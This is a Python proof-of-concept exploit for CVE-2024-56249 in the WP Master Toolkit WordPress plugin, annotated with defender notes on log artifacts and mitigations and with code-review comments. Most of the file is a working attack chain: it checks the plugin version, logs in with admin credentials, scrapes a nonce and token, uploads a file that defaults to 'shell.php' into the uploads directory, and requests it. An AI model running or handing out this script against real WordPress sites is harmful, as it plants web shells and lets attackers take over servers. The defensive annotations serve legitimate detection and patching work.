"""Proof-of-concept for CVE-2024-56249 (WP Master Toolkit plugin for WordPress).

Flow as implemented below:
  1. GET the plugin's README.txt and read its ``Stable tag`` to decide whether
     the install is in scope (``probe_vulnerability``).
  2. POST credentials to ``wp-login.php`` (``breach_wp_login``); the CLI help
     describes the account as a WordPress admin.
  3. GET the plugin's file-manager admin page and scrape a ``nonce`` and a
     ``token`` out of it (``extract_exploit_tokens``).
  4. POST a local file to that same page so it is written under an uploads
     path (``deploy_payload``).
  5. GET the resulting URL and print its body (``check_file_uploaded``).

Defender notes: every step is a plain HTTP request and leaves web-server log
entries in a fixed order — GET ``/wp-content/plugins/wpmastertoolkit/README.txt``,
POST ``/wp-login.php``, GET then multipart POST to
``/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p=...``, and
finally a GET to a new ``.php`` file under ``wp-content/uploads/``. A new PHP
file appearing in the uploads tree, and authenticated requests to the
file-manager page that carry a multipart body, are the high-signal artifacts.
The script's own threshold treats ``Stable tag`` values at or below 1.13.1 as
vulnerable; keeping the plugin above that version, disallowing PHP execution
under the uploads directory, and rotating any admin credentials that may have
been exposed are the mitigations this flow implies. Note the script needs
valid credentials to get past step 2.
"""
import requests
import re
from bs4 import BeautifulSoup  # NOTE(review): imported but never used in this file
import argparse
import os  # NOTE(review): imported but never used in this file
from urllib.parse import urlparse

# Exploit script by Nxploit | Khaled Alenazi

# Silences urllib3's InsecureRequestWarning; every request below is sent with
# TLS certificate verification disabled (verify=False / session.verify=False).
requests.packages.urllib3.disable_warnings()

# NOTE(review): several bracketed emoji prefixes in the print strings are
# mis-encoded in this copy of the file (e.g. "[đŸ”Ĩ]", "[âš ī¸]", "[â„šī¸]");
# they are left byte-identical here because they are runtime output.


def probe_vulnerability(target_url: str) -> bool:
    """Return True if the plugin README advertises a version the script treats as in scope.

    Fetches ``<target_url>/wp-content/plugins/wpmastertoolkit/README.txt`` and
    parses the ``Stable tag:`` line. Any HTTP status other than 200, a missing
    tag, a request error, or a version judged "newer" all return False.

    Args:
        target_url: Site base URL, already stripped of its trailing slash by the caller.

    Returns:
        True when the parsed version passes the threshold check below, else False.
    """
    readme_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/README.txt"
    try:
        response = requests.get(readme_url, verify=False, timeout=10)
        if response.status_code == 200:
            match = re.search(r'Stable tag:\s*([\d.]+)', response.text)
            if match:
                version = match.group(1)
                print(f"[🔍] Detected plugin version: {version}")
                # NOTE(review): stripping the dots and comparing numerically is
                # not a real version comparison — "1.2" becomes 12 and "1.14.0"
                # becomes 1140, and both compare as <= 1131 — so this check can
                # misclassify installs in either direction. Do not rely on its
                # "NOT vulnerable" verdict to confirm a patched site.
                if float(version.replace(".", "")) <= 1131:
                    print("[đŸ”Ĩ] Target is VULNERABLE to CVE-2024-56249! Exploiting...")
                    return True
                else:
                    print("[❌] Target is NOT vulnerable. (Version is newer than 1.13.1).")
                    return False
            else:
                print("[âš ī¸] Could not determine plugin version.")
                return False
        else:
            print("[❌] README file not found. Cannot verify the vulnerability.")
            return False
    except requests.RequestException as e:
        print(f"[❌] Error while probing vulnerability: {e}")
        return False


def breach_wp_login(session, login_url: str, username: str, password: str, headers: dict) -> bool:
    """POST credentials to wp-login.php and report whether a login cookie was set.

    Success is judged solely by the presence of a cookie whose name contains
    ``wordpress_logged_in`` in the session jar after the POST; the HTTP
    response itself is not inspected.

    Args:
        session: ``requests.Session`` that will carry the resulting cookies.
        login_url: Full URL of ``wp-login.php``.
        username: Account name sent in the ``log`` field.
        password: Password sent in the ``pwd`` field.
        headers: Extra request headers (the caller passes a browser User-Agent).

    Returns:
        True if a ``wordpress_logged_in*`` cookie is present afterwards, else False.
    """
    print("[🔑] Attempting to log in...")
    login_data = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }
    try:
        # NOTE(review): ``response`` is assigned but never read.
        response = session.post(login_url, data=login_data, headers=headers, timeout=10)
        if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
            print("[✅] Authentication successful!")
            return True
        else:
            print("[❌] Authentication failed! Check credentials.")
            return False
    except requests.RequestException as e:
        print(f"[❌] Error during authentication: {e}")
        return False


def extract_exploit_tokens(session, exploit_url: str, headers: dict):
    """Scrape the nonce and token embedded in the plugin's file-manager admin page.

    The nonce is read from a JavaScript object literal assigned to
    ``WPMastertoolkit_FileManager``; the token is read from a hidden form
    input named ``token``. Both regexes only match ``[a-zA-Z0-9]+`` values.

    Args:
        session: Authenticated ``requests.Session``.
        exploit_url: File-manager admin page URL (includes the ``p`` path parameter).
        headers: Extra request headers.

    Returns:
        ``(nonce, token)`` as strings, or ``(None, None)`` if either is missing
        or the request fails.
    """
    print("[📡] Extracting security tokens...")
    try:
        response = session.get(exploit_url, headers=headers, timeout=10)
        nonce_match = re.search(r'WPMastertoolkit_FileManager\s*=\s*\{.*?"nonce":"([a-zA-Z0-9]+)".*?\}', response.text)
        token_match = re.search(r'name="token"\s*value="([a-zA-Z0-9]+)"', response.text)
        if nonce_match and token_match:
            nonce_value = nonce_match.group(1)
            token_value = token_match.group(1)
            print(f"[✅] Extracted nonce: {nonce_value}")
            print(f"[✅] Extracted token: {token_value}")
            return nonce_value, token_value
        else:
            print("[❌] Failed to retrieve nonce or token!")
            return None, None
    except requests.RequestException as e:
        print(f"[❌] Error extracting security tokens: {e}")
        return None, None


def deploy_payload(session, upload_url: str, file_path: str, file_name: str, nonce: str, token: str, headers: dict) -> bool:
    """Send a multipart upload of a local file to the file-manager page.

    The file named ``file_name`` is opened from the current working directory
    (not from ``file_path``); ``file_path`` is only sent to the server as the
    ``p`` / ``fullpath`` form fields. Success is judged by HTTP 200 alone — the
    body is not checked, so a 200 does not prove the file was written.

    Args:
        session: Authenticated ``requests.Session``.
        upload_url: File-manager admin page URL to POST to.
        file_path: Server-side destination path sent as ``p`` and ``fullpath``.
        file_name: Local file to read and also the remote filename.
        nonce: Value scraped by ``extract_exploit_tokens``.
        token: Value scraped by ``extract_exploit_tokens``.
        headers: Extra request headers.

    Returns:
        True on HTTP 200, False on any other status or request error.
    """
    print(f"[📤] Attempting to upload {file_name} to {file_path}...")
    # NOTE(review): the file handle opened here is never closed (no ``with``
    # block), and a missing local file raises an uncaught FileNotFoundError
    # before the try below.
    files = {
        "file": (file_name, open(file_name, "rb"), "text/plain")
    }
    payload_data = {
        "p": file_path,
        "fullpath": file_path,
        "token": token,
        "nonce": nonce
    }
    try:
        response = session.post(upload_url, headers=headers, files=files, data=payload_data, timeout=10)
        if response.status_code == 200:
            print("[✅] Upload request sent successfully.")
            return True
        else:
            print(f"[❌] Upload failed! Server response: {response.text}")
            return False
    except requests.RequestException as e:
        print(f"[❌] Error during payload upload: {e}")
        return False


def check_file_uploaded(file_check_url: str) -> bool:
    """GET the expected upload URL and print its body if it answers 200.

    NOTE(review): unlike every other request in this file this one is sent
    without ``verify=False`` or a timeout and without a ``RequestException``
    handler, so a self-signed certificate or a hang surfaces as an uncaught
    exception here rather than a printed error. The failure message below is
    also printed on a non-200 status, so its "despite HTTP 200 response"
    wording does not describe what actually happened.

    Args:
        file_check_url: URL the caller built from the upload path and filename.

    Returns:
        True if the status code was 200, else False.
    """
    response = requests.get(file_check_url)
    if response.status_code == 200:
        print(f"[đŸ”Ĩ] Shell uploaded successfully! URL: {file_check_url}")
        print("[â„šī¸] File content:\n")
        print(response.text)
    else:
        print("[❌] File not found in upload folder, despite HTTP 200 response.")
    return response.status_code == 200


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=" Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)")
    parser.add_argument("-un", "--username", required=True, help="WordPress admin username")
    parser.add_argument("-p", "--password", required=True, help="WordPress admin password")
    parser.add_argument("-fp", "--filepath", default="wp-content/uploads/2025/03", help="File upload path (default: wp-content/uploads/2025/03)")
    parser.add_argument("-fn", "--filename", default="shell.php", help="File name to upload (default: shell.php)")
    args = parser.parse_args()

    # The first path segment of the URL (e.g. "wordpress4") is treated as the
    # WordPress install folder and prepended to the file-manager ``p``
    # parameter; when the URL has no path the literal "wordpress" is assumed.
    parsed_url = urlparse(args.url)
    wordpress_folder = parsed_url.path.strip("/").split("/")[0] if parsed_url.path.strip("/") else "wordpress"
    wordpress_url = args.url.strip().rstrip("/")

    # NOTE(review): bare ``exit()`` is the site-module helper; ``sys.exit()``
    # (or ``raise SystemExit``) is the conventional way to stop a script.
    if not probe_vulnerability(wordpress_url):
        exit()

    session = requests.Session()
    session.verify = False  # disables TLS certificate checks for all session requests
    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}
    login_url = f"{wordpress_url}/wp-login.php"
    # NOTE(review): ``exploit_url`` and ``upload_url`` are built from the same
    # template and are identical; the page is GET'd for tokens and POST'd for
    # the upload.
    exploit_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}"
    upload_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}"

    if not breach_wp_login(session, login_url, args.username.strip(), args.password.strip(), headers):
        exit()

    nonce, token = extract_exploit_tokens(session, exploit_url, headers)
    if not nonce or not token:
        exit()

    if deploy_payload(session, upload_url, args.filepath.strip(), args.filename.strip(), nonce, token, headers):
        # The "success" line below is printed on HTTP 200 from the upload POST
        # alone; only check_file_uploaded actually confirms the file is served.
        shell_url = f"{wordpress_url}/{args.filepath.strip()}/{args.filename.strip()}"
        print(f"[đŸ”Ĩ] Shell successfully uploaded! Access it here: {shell_url}")
        check_file_uploaded(shell_url)